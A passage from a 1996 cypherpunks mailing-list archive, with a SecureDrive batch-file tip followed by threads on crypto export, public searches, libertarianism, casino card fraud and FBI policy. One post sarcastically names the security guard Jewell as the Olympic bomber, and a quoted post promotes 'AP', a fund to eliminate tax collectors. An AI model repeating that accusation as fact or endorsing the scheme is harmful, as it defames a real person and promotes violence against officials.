following in your AUTOEXEC.BAT file...

cd\utils\secdr14a
sectsr
login D: /S
@choice /T:N,1
@if errorlevel 2 goto ContinueLoad
:EnterPP
login D:
@if errorlevel 1 goto Again
@if errorlevel 0 goto ContinueLoad
:Again
@choice Try again?
@if errorlevel 2 goto ContinueLoad
@goto EnterPP
:ContinueLoad
cd\
cls

abviously you have to replace the D: with your drive letter, and the
directory at the top with your SECDR14a dir.  Then, in Win95 you have to
turn off 32 bit disk access.  To do this without losing all the speed of
virtual memory, do the following...
  right-click on My Computer
  click on Properties, Performance, File System, Troubleshooting
  and check the box labeled: Disable all 32 bit protect-mode disk drivers.
  Re-boot.

If you have a CD-ROM drive, you will have to load the DOS drivers in order
to be able to access it.

Granted, this is just a kludge until Secure Drive is re-designed for Win95,
but I've tried a dozen different combinations, and this gives you all the
SecDrv security under Win95 (except being able to lock/unlock after Win95
starts) and sacrafices the least amount of system performance.

Enjoy!
 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |          PGP 2.6.2 public key available at www.pb.net/~wizard        | 
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 09:58:46 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <ae2533b7090210041fd8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:51 PM 7/31/96, Mark M. wrote:

>On Tue, 30 Jul 1996, Tom Weinstein wrote:
>
>> We won't do this.  Our domestic version will always contain the
>> strongest crypto we can provide.
>
>Then what is the concern about anonymous arms-traffickers uploading the strong
>crypto version to foreign FTP sites?  I recall you saying that the State
>Department might revoke Netscape's "permission" to provide a domestic version
>if it was exported.

I believe the issue involves Netscape's _method of distribution_, that is,
its placement of Navigator on a publically-accessible site with various
"checks" of who is trying to download it.

This is something the State Department could theoretically get involved
with, due to the ITARs and the way they are worded.

Actually approving of disapproving a piece of software for sale to U.S.
citizens is not currently possible.

(Though this is worrisome, speculatively. Various other weapons, such as
nukes and CBW, are in fact prohibited for sale to private citizens unless
approved. And sales of various guns are limited. So, if "crypto is a
munition," the same could perhaps apply. This runs into the "crypto as
speech" issue, of course.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 1 Aug 1996 04:14:38 +0800
To: cypherpunks@toad.com
Subject: Geo-Politics
Message-ID: <199607311620.QAA08448@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Two articles today in WSJ and FiTi show an unpected link between
geo-technology and geo-politics: 
 
 
One reviews the explosives sniffing technology invented by geologist
Anthony Barringer for global mineral exploration -- like copper, luxury
metals and oil -- but which came to have more practical utility in the
antiterrorist market (the company's stock is rocketing). Even so, its best
use may prove to be in discovering petroleum and other wealth of the earth.
As this tech becomes more widespread, Shell has good reason to encrypt its
geological logs and steganographize its governmental bribes. 
 
 
And, a column reviews the tie between nationalist conflicts (markets for
cheap explosives) and the invention of modern states (markets for expensive
munitions). How the citizenry of modern nations are united by "the need for
context-free communication" that was once limited to the members of the
"high culture" of pre-modern communities. And how the nationalist citizenry
are adopting the cheap versions of expensive munitions of the states' high
culture to get their overdue share of the earth's pie. It explores the
geopolitical differences among: 
 
 
Ethnic community 
Ethnic category 
Nation 
Nation-state 
Nationalism 
 
 
----- 
 
 
http://jya.com/geopol.txt 
 
 
GEO_pol 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 1 Aug 1996 10:46:58 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Violation or Protection? [OLYMPICS]
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960731235128Z-27103@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	tcmay@got.net
>
>If the Centennial Park is a public place, not a private one, as I believe
>to be the case, then it seems to me a person is within his rights to turn
>down the offer to be inspected, frisked, interrogated, etc.
........................................................

But if the park was a private one, would it make any difference?

Between the "right" of being left alone, and the "legitimate needs" of
law enforcers to frisk suspicious looking characters - whether in public
or in private places - it seems rather difficult to draw that dividing
line between allowance and forbearance.

 I mean, either it is, or it isn't, a "right".   When could it really be
okay to violate that definition.  How are the law enforcers to do their
job if they can't intrude into your shopping bag, when it's a critical
National Emergency.  This is what Denning is always referring to. 

   ..
Blanc 
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 1 Aug 1996 11:30:17 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Dry Under the Waterfall
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960801001638Z-27219@inet-01-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	tcmay@got.net
>
>I hear that "The Grasshopper and the Ant" is no longer considered proper
>reading material for children, that they need to have their self-esteem
>raised, that "I Have Two Mommies" is a more important book for them to
>read.
....................................................

What a difference it would make if along with the mandatory school
attendance everyone received a mandatory education in basic economics,
starting in Jr. High.

Legislators and socially conscious individuals bemoan the lack of jobs,
the downsizing of companies, the low salary wages, the imperative need
for re-training, etc. as social problems to deal with by government  --
yet the very thing which everyone could use the most of, that
information which could prepare the minds of "America's future" for
dealing with the way things work in a capitalist system and make it
easier to transition into a world of uncertainty - while the
administrations have the fortituous opportunity to provide it, is not
delivered.

Not that I expect that classes in economics delivered through the public
schools would be all that accurate or therefore of much value, but the
point being that those people who publicly complain to the general
population about how the poor should receive subsidized support do not
consider the disfavor of having the school system take up 12 years of
everyone's time memorizing non-pertinent data, when they could have been
using that time to good purpose  -- *prior to* becoming independent
adults needing an understanding of what it takes to make a living.

"Knowledge is power", it is said.  There are a lot of powerless
beneficiaries of public education around.  Or that's what a lot of
people claim to be (powerless to help themselves).

   ..
>Blanc
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Thu, 1 Aug 1996 11:33:09 +0800
To: cypherpunks@toad.com
Subject: Re: If you have Fortezza experience
In-Reply-To: <9607311634.AA21048@sulphur.osf.org>
Message-ID: <199608010105.SAA29340@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> From: Rich Salz <rsalz@osf.org>
> 
> By way of penance for sending email to a list that I am not on, I
> offer a short page on exporting crypto software,
> http://www.osf.org/crypto-export.html, that some might find useful.

What kind of penance is that?  Than URL is bogus.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Thu, 1 Aug 1996 14:54:21 +0800
To: "cypherpunks" <tcmay@got.net>
Subject: Re: Photo IDs (Re: A Libertine Question)
Message-ID: <199608010427.VAA13537@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 31 Jul 96 14:27:54 -0800, tcmay@got.net wrote:

>>was allegedly requiring *two* pieces of ID for flights.  If they are talking
>>about two pieces of photo -- government-issued ID, I wonder where the 80% of
>
>Yeah, this "two photo IDs" is strange, given that:

>a. many ordinary people have only one form of photo I.D., namely, their
>driver's license (and many don't even have that)

>b. terrorists and other such persons are _very_ likely to have multiple
>forms of I.D., though of course not in their "true name."
>
>Hence, the policy looks ineffectual and just a sop to public relations.

And who really thought a response just days later would be anything else?

>And just what is a "true name" for the purposes of this law, anyway? Birth
>name? And what is that? What about people who marry, change names, etc.?
>Given that there is no "standard" for photo I.D.s, will my Official
>Cypherpunks Card count?

Now *that* might be another way of generating Cypherpunks revenue! (1
card per FPGA paid for the DES cracker... Or maybe every $15 toward the
CPLDF or PRZ)

# Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
# Automatically receive my resume or PGPKEY by sending email with a subject
# of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
# Web site: http://www.io-online.com/adamsc/adamsc.htm
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 1 Aug 1996 06:31:58 +0800
To: cypherpunks@toad.com
Subject: Lords Boost Robust Crypto
Message-ID: <199607311815.SAA01412@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A positive excerpt from UK's House of Lords's July 23 lengthy, thoughtful
report on the information society: 
 
 
http://www.hmsoinfo.gov.uk/hmso/document/inforsoc/ch5.htm#5.92 
 
 
 
5.92 The US Government's restrictions on exporting software from the USA
which includes high levels of encryption is threatening to become a major
barrier to the development of the information Superhighways, which is in
no-one's interests. The Government must join with other EU Member States in
putting pressure on the USA to relax its restrictions on the export of
encryption technology. 
 
 
Thanks to Mark Gould on Cyberia-L, see the full report at: 
 
 
http://www.hmsoinfo.gov.uk/hmso/document/inforsoc.htm 
 
 
INFORMATION SOCIETY: AGENDA FOR ACTION IN THE UK 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Thu, 1 Aug 1996 09:31:18 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question
Message-ID: <1.5.4.32.19960731223430.006cdb98@pop.atl.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:01 AM 7/31/96 -0700, Greg Broiles wrote:
>At 04:50 PM 7/30/96 -0700, Mike Duvos wrote:
>>Alan Horowitz writes:
>>> On Mon, 29 Jul 1996 jbugden@smtplink.alis.ca wrote:
>>> 
>>> > Think of how many of our laws are being enacted that tacitly make being
>>> > poor or indigent a crime.
>>> 
>>>    Horseshit. This is a poorly-disguised re-tread of one of the standard 
>>> lines of the Patrice Lumumba University brand of leftist agitprop.

>(* Other people (apparently not "strong libertarians") buy into all of that
>suspicious crap about the Bill of Rights and people being allowed to be
>themselves even if other people find it upsetting or non-decorous.

Speaking as a strong libertarian, I can assure you that Alan Horowitz is
completely off-base.  My gut feeling is that he is trolling this entire
thread, so I will attempt to make my response as civil as possible.

Strong libertarians recognize that my right to walk the street is in no
way superior to anyone elses right to walk the street.   Strong libertarians
recognize that it is not against the law to smell bad, or to have rotten
teeth, or in other ways be un-appealing.  

"They have no right to live in Seattle, they should move somewhere they can
afford".   That statement is ridiculous.  No one has a 'right' to live in
a certain place.  In fact, Mr Horowitz, you don't have a right to go to
downtown Seattle and not be accosted by the homeless.   If you don't like
it, move to somewhere the homeless ain't, and don't let the door hit your
ass on the way out.

Apparently Mr. Horowitz is one of the tiresome "legalize everything that doesn't
offend me, ban everything else" libertarians.   Here's a clue to a true 
libertarian thought process:
    You offend me, Mr. Horowitz.  Your attitude by itself is enough to make
my throat clench in distaste, but the fact that you call yourself a
libertarian is exceptionally galling.  From your e-mail, you show no
understanding of what
it means to be a libertarian, and libertarians are extremely ill-served by 
your preposterous claims.  But I will defend to the death your right to make
them.  




   
---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 12:44:22 +0800
To: cypherpunks@toad.com
Subject: RE: Violation or Protection? [OLYMPICS]
Message-ID: <ae255b9d0002100491ab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 7/31/96, Blanc Weber wrote:
>>From:  tcmay@got.net
>>
>>If the Centennial Park is a public place, not a private one, as I believe
>>to be the case, then it seems to me a person is within his rights to turn
>>down the offer to be inspected, frisked, interrogated, etc.
>........................................................
>
>But if the park was a private one, would it make any difference?

Of course, which is why stores can have "bags will be searched" policies,
restrictions about atire, and all sorts of other policies which are not
allowed in public places.

Disneyland is a private park, and has rules which are not the rules a
public park can have.

Put it this way, "My house, my rules."


> I mean, either it is, or it isn't, a "right".   When could it really be
>okay to violate that definition.  How are the law enforcers to do their
>job if they can't intrude into your shopping bag, when it's a critical
>National Emergency.  This is what Denning is always referring to.

One needs to distinguish "rights" vis-a-vis government actions, and the
policies of private actors. The usual point about "freedom of speech"
applies. E.g., Blanc has "freedom of speech," but not inside Microsoft.

Not to lecture, but this frequent blurring of public vs. private areas, of
government vs. corporate actions, of "property rights," is  hurting the
cause of liberty.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Thu, 1 Aug 1996 08:31:14 +0800
To: "'Igor Chudov'" <ichudov@algebra.com>
Subject: RE: Game Theory and its Relevance to Cypherpunks
Message-ID: <01BB7F6B.565BB6E0@ip95.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain



In Iran, Chenghis Khan killed 30 millions out of 40 who previously
lived there.

Ghenghis Khan, not Chenghis Khan.

It basically proves that people now are no better and no worse than 
people then. Really, there is no reason for things to be otherwise.

I agree with you. Massacre done before is more worst than now. But there are a lot of moral people in those times.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 13:12:35 +0800
To: cypherpunks@toad.com
Subject: Jewell is the Militia Bomber!!!!
Message-ID: <ae25687f0102100499f1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The security guard Jewell is now confirmed to be the prime suspect. While
NBC News is reporting that no evidence _directly_ links him to the bombing,
the evidence against him is overwhelming:

1. He is overweight. With the exception of The Unabomber, most perps in
cases like this are fat.

2. They found a _shotgun_ in his cabin.

3. He had an interest in guns. (Back issues of "Guns and Ammo" are bad
enough, but possession of even a single issue of "Combat Handguns" is
sufficient to convict in 39 of the 50 states.)

4. News sources are reporting that authorities who searched his apartment
and his cabin "came up empty," which surely implies that he planned this
crime with the help of others.


--Tim May

(P.S. I, too, was convinced Jewell was the guy. But in recent hours it is
looking like a "rush to judgment" could be involved. There is strong
pressure to "solve the crime" by the close of the Olympics on Sunday.)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 1 Aug 1996 13:33:45 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Violation or Protection? [OLYMPICS]
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960801025148Z-27607@inet-01-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	tcmay@got.net
>
>Of course, which is why stores can have "bags will be searched" policies,
>restrictions about atire, and all sorts of other policies which are not
>allowed in public places.
>
>Disneyland is a private park, and has rules which are not the rules a
>public park can have.
>
>Put it this way, "My house, my rules."
......................................................

"My company, or my country/government?" 

This is like kids trying to decide which parent's admonitions to heed.

There is a term I have heard to describe a situation, of "Clear &
Present Danger", where the policing forces of government are to be
allowed, or have the temporary right, to override all the rules which
normally would apply the rest of the time.   This is what I think people
calculate when they decide it's okay to have intrusions into their
person or belongings, whether they are in a public or private domain
("just for this time; after that everything will go back to normal").

I think everything should be immediately privatized.  That would solve
everything.  Everyone would always know where they stood,
philosophically & practically, depending on whose ground they were
standing on.

:>)
   ..
Blanc







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nv89-pla@nada.kth.se
Date: Thu, 1 Aug 1996 05:48:34 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes in the digicash world
Message-ID: <199607311815.UAA29119@mail.nada.kth.se>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell wrote:
> If, for every $1 somebody paid in taxes, he instead (or, in addition to) 
> paid 10 cents to a fund to eliminate the tax collectors, at the end of that 
> year he wouldn't be paying any taxes anymore.  That's why AP will work so well.
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 

Isn't getting rid of the tax collectors a public good? If I pay money 
to this fund, everyone will benefit (assuming getting rid of the tax 
collectors is good). 


-Peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 10:58:19 +0800
To: John Brothers <cypherpunks@toad.com
Subject: Re: A Libertine Question
Message-ID: <2.2.32.19960801001858.008cc944@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:34 PM 7/31/96 -0400, John Brothers wrote:
>Apparently Mr. Horowitz is one of the tiresome "legalize everything that
doesn't
>offend me, ban everything else" libertarians.   Here's a clue to a true 
>libertarian thought process:
>    You offend me, Mr. Horowitz.  Your attitude by itself is enough to make
>my throat clench in distaste, but the fact that you call yourself a
>libertarian is exceptionally galling.  From your e-mail, you show no
>understanding of what
>it means to be a libertarian, and libertarians are extremely ill-served by 
>your preposterous claims.  But I will defend to the death your right to make
>them.  

I think we should all just try and get along. <G>

Since there are no "public places" in a free society, none of this comes up
because everyone will be in places were they are welcome.  There will be
many more kinds of places than the two ("public" and "private") we have now.
Some will be wide open and some will be highly restricted with all
gradations in between.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 1 Aug 1996 12:02:26 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "An who shall guard the guardians?"
In-Reply-To: <ae24db790002100463bd@[205.199.118.202]>
Message-ID: <199608010119.UAA24361@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> ObClipper: "Who shall guard the guardians?" While the various Clipper
> proposals have putative safeguards to limit access, think of Craig
> Livingstone, a rent-a-cop the Clintons hire to work on their Enemies List.
> And think of the dossiers of J. Edgar Hoover. And think of Nixon. And think
> of what President Pat Buchanan would do with Government Access to Keys.

What President Pat Buchanan would do with Government Access to Keys, I 
wonder? (seriously)

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 1 Aug 1996 13:31:31 +0800
To: cypherpunks@toad.com
Subject: The "Secure" version of Netscape for Linux is *NOT*
Message-ID: <2.2.32.19960801033402.00fc1ab8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I just installed the "secure" version of Netscape off of the "US Only"
download site.

Seems that it is actualy the international version and not the 128 bit version.

How many people have downloaded this version only to find that they
downloaded something that they could have downloaded faster from a mirror
site?  How many people have had their downloads slowed down due to people
downloading insecure Linux versions from the US only site?

I think I have a justifiable reason to be pissed.

Another waste of my time...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@charley.clark.net>
Date: Thu, 1 Aug 1996 11:28:18 +0800
To: cypherpunks@toad.com
Subject: Re: ANNOUNCE: 2nd trip to National Cryptologic Museum (fwd)
Message-ID: <199608010037.UAA09214@charley.clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Is it a bar where you can smoke ?? ( the legal stuff ) 

>>>>> Forwarded message from tcmay@got.net (Timothy C. May)

At 5:15 PM 7/31/96, Zorak Ramone wrote:

>        Following the lecture, we will be going over to Henckles (10
minutes
>from the museum), a local resturaunt reported to be a favorite hangout
for
>NSA employees.  Henckles has amazing sandwiches as well as good beer on
tap.

Jeez, first they tap our phones, and now they're tapping our beer!


--Klaus

<<  End forwarded message


          Charles E. Sparks
In God We Trust, All Others we Encrypt
Public Key at:
http://www.clark.net/pub/charley/pc_1.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 11:01:32 +0800
To: cypherpunks@toad.com
Subject: Re: Violation or Protection? [OLYMPICS]
Message-ID: <2.2.32.19960801004246.00884d9c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:04 PM 7/31/96 -0700, Timothy C. May wrote:

>On the one hand, were I to be hanging out in this park, given the recent
>event and the focus on this park for crazies to attack, I would feel better
>if bags were at least briefly looked into and "suspicious" bags left
>unattended covered with explosive-containing shields.

On the gripping hand, if you (a generic you not TM) were in a park at 1:15
am listening to Jack Mack and the Heart Attacks in a crowd with infants in
strollers, etc and a pipe bomb went off you could just consider it part of
the rich stew of punk/pop crossover sensibilities that have become so
important in modern life.  Those who seek a "Heart Attack" may get one.  

If you hang out in modern crowds you risk getting blown up by fame seeking
cop wanabees (or getting your FBI file read by ex-bouncer political heavy
wanabees or getting kneecapped by body-guard-to-the-stars wanabees).  Note
the physical and psychological similarities among Jewell, Livingstone, and
Tanya Harding's boyfriend.

Didn't your mothers tell you what happened if you hung out in public parks
after midnight.  Or as Republicans said to the TV set when Teddy was
chanting "Where Was George?" during his speech at the 1988 Democratic
National Convention; "Sober and at home in bed with his wife."

There is something very counter survival about seeking out crowds.  It has
always been thus.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 1 Aug 1996 14:47:03 +0800
To: coderpunks@toad.com
Subject: s/key for linux?
Message-ID: <2.2.32.19960801042307.00679844@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


        
I'm having difficulty getting the few releases I've got of 
S/Key to compile under linux.  Anyone know of a release that's
already been ported?  Thanks... //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 1 Aug 1996 14:49:33 +0800
To: cypherpunks@toad.com
Subject: Re: Jewell is the Militia Bomber!!!!
In-Reply-To: <ae25687f0102100499f1@[205.199.118.202]>
Message-ID: <199608010436.VAA05251@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

> The security guard Jewell is now confirmed to be the prime suspect. While
> NBC News is reporting that no evidence _directly_ links him to the bombing,
> the evidence against him is overwhelming:

This is almost as amusing as the evidence cited by the Feds in the roundup
of militia members a couple of days ago. They told us in perfect seriousness 
that one of them had fired tennis balls out of a metal tube filled with hair
spray, and that another had filed for bankruptcy. 

Obvious warning signs. :)

Of course bail was denied to protect the community. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 1 Aug 1996 14:59:28 +0800
To: cypherpunks@toad.com
Subject: Re: VISA Travel Money
Message-ID: <2.2.32.19960801045505.00695c6c@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>> It's not as anonymous as cash, but it might draw a lot less
>> attention in my circumstances.  I think it has a place in one's
>> aresenal of privacy enchancing technologies.
>
>     This card has the value "written" when you "purchase" it right? 
>
>    Any one wanna bet on how long it will take the "Hacker" Community
>to figure out how to "refill" it? Otherwise all you have is a 
>debit card. 

Interesting related story about DefCon:  for those of you who have been
to Las Vegas, you know that many casinos have mag stripe cards that are
issued for a variety of reasons, that are just as good as cash in the
casino, but can't be used anywhere else.  Many use them as a sort of 
debit card for slot machines.  The story goes that a few DefCon attendies 
acquired a few of these cards from the Tropicana, and re-wrote the stripe 
to read that they had over 60,000 "points".  I guess they discovered that
the card was re-written each time it was used.  Unfortunately for them,
what they didn't discover was that the system also kept track on a 
computer somewhere, and the large difference between the computer's tally
and the card's value set off numerous red flags, they found out relatively 
quickly when two Casino Security guards escorted them to the police station.  
Oops.  I can't help but wonder what would've happened if they only made
the difference like 10 points instead of 60K?  These two people were not
too bright, as they were staying at the Tropicana, and probably had all 
the equipment in their rooms.  If they were of age, I believe (depending
on what they found in the room) they can each get multiple 15 year federal
sentences.  

Moral of the Story: Mag Stripe cards are never secure by themselves (the 
credit card companies mistakenly relied on security by obscurity and are
feeling the painful effects still today), but have the potential to be secure 
if backed up by that kind of system.  However, it would only really be
practical 
in a closed environment like a Casino.   

Thus, for the sake of all the lovely banks I know and love, I hope they
either A. choose something other than mag. stripes, or B. use them only as
debit cards that are checked against a bank account when used.

//cerridwyn//








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 1 Aug 1996 15:48:05 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <2.2.32.19960801051356.0069c5f8@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Okay, so their boss is part of the law making process, subject to the checks
>> and balances that exist between the three branches of US government. They
>> are in a position to supply their boss with data and I am personally
>> impressed with their grasp of some of that data (it sounds to me like they
>> are telling their boss that hackers like the ones at Defcon are not the
>> problem).

It was interesting how the Agent made the point that the FBI was there to 
enforce laws, not make policy.  Then his Boss's role in the law making process
was brought up, the Agent said "but any of you can do the same thing, you
all have a voice" etc etc.  Then he refused to answer political questions 
based on the fact that he was there as a representative of the FBI, failing
to see that his Boss is also a representative of the FBI when recommending
legislation.  (Again, I realize he was "under orders" not to discuss it, I 
wish he wouldn't try to justify it with obviously faulty logic.)

>    I think what they are really saying is that they would love to
>bust most hackers, but since they can't they might as well use some of
>them to catch the bigger fish.  If they truly did believe in the laws they
>are supposed to uphold they wouldn't associate with hackers (who commit
>computer crimes) at all.

A more cynical view is that they are there to protect some of the biggest
institutions of "organized crime" (ie: Congress, At&t, Microsoft, etc) who
are ripping people off on a daily basis from the other organizations who
refuse to play by their rules.

//cerridwyn//






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 1 Aug 1996 15:45:43 +0800
To: cypherpunks@toad.com
Subject: Re: Jewell is the Militia Bomber!!!!
Message-ID: <199608010522.WAA04374@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:49 PM 7/31/96 -0700, Timothy C. May wrote:
>
>The security guard Jewell is now confirmed to be the prime suspect. While
>NBC News is reporting that no evidence _directly_ links him to the bombing,
>the evidence against him is overwhelming:
>
>1. He is overweight. With the exception of The Unabomber, most perps in
>cases like this are fat.

Uh, just like that guy in Jurassic Park!

('Course, there's an explanation for this.   "The butler did it" went out over 30 years ago.  They're running out of butlers, and, well, many butlers were fat, so...)

>2. They found a _shotgun_ in his cabin.

No, no, Tim.   The proper way to deliver this to a TV audience is, "They 
found an ARSENAL in his COMPOUND!"

(see how much more exciting it is?!?  BTW, how many wives does he have?)


>3. He had an interest in guns. (Back issues of "Guns and Ammo" are bad
>enough, but possession of even a single issue of "Combat Handguns" is
>sufficient to convict in 39 of the 50 states.)

Any copies of that SUBVERSIVE publication Shotgun News?

>4. News sources are reporting that authorities who searched his apartment
>and his cabin "came up empty," which surely implies that he planned this
>crime with the help of others.

And he had to have scoured it clean JUST BEFORE the authorities arrived!  
Yeah, that's the ticket!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 1 Aug 1996 16:16:27 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question
Message-ID: <2.2.32.19960801053838.006a2bb4@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Most demands for ID and conformations with police involve the operation of
>motor vehicles.  I have never been "IDed" except at border crossings and
>when I was operating motor vehicles.  Clean and dressed up people are rarely
>IDed on foot.  Maybe you should mention some of the specific practices in
>Seattle that disturb you.

I was downtown Seattle at night time (early morning), walking around, minding 
my own business. Probably not actively maintaining public decorum, but
certainly 
not doing anything unorderly.  A cop approached me and asked what I was doing,
I told him none of his business.  He asked me for my ID, I said why, am I under
arrest?  He said no, but he needs to see my ID.  I told him he has no right to
ask me for my ID, especially when I've been doing nothing wrong, if I wanted to 
live in those conditions, I'd move to Iraq or China or something.  I got out my 
handy pocket tape recorder, and asked him to state his name and repeat his
request 
for the benefit of my lawyer who'd be contacting him. At this point the few
other 
people on the street had sort of gathered a few yards away, and the cop decided
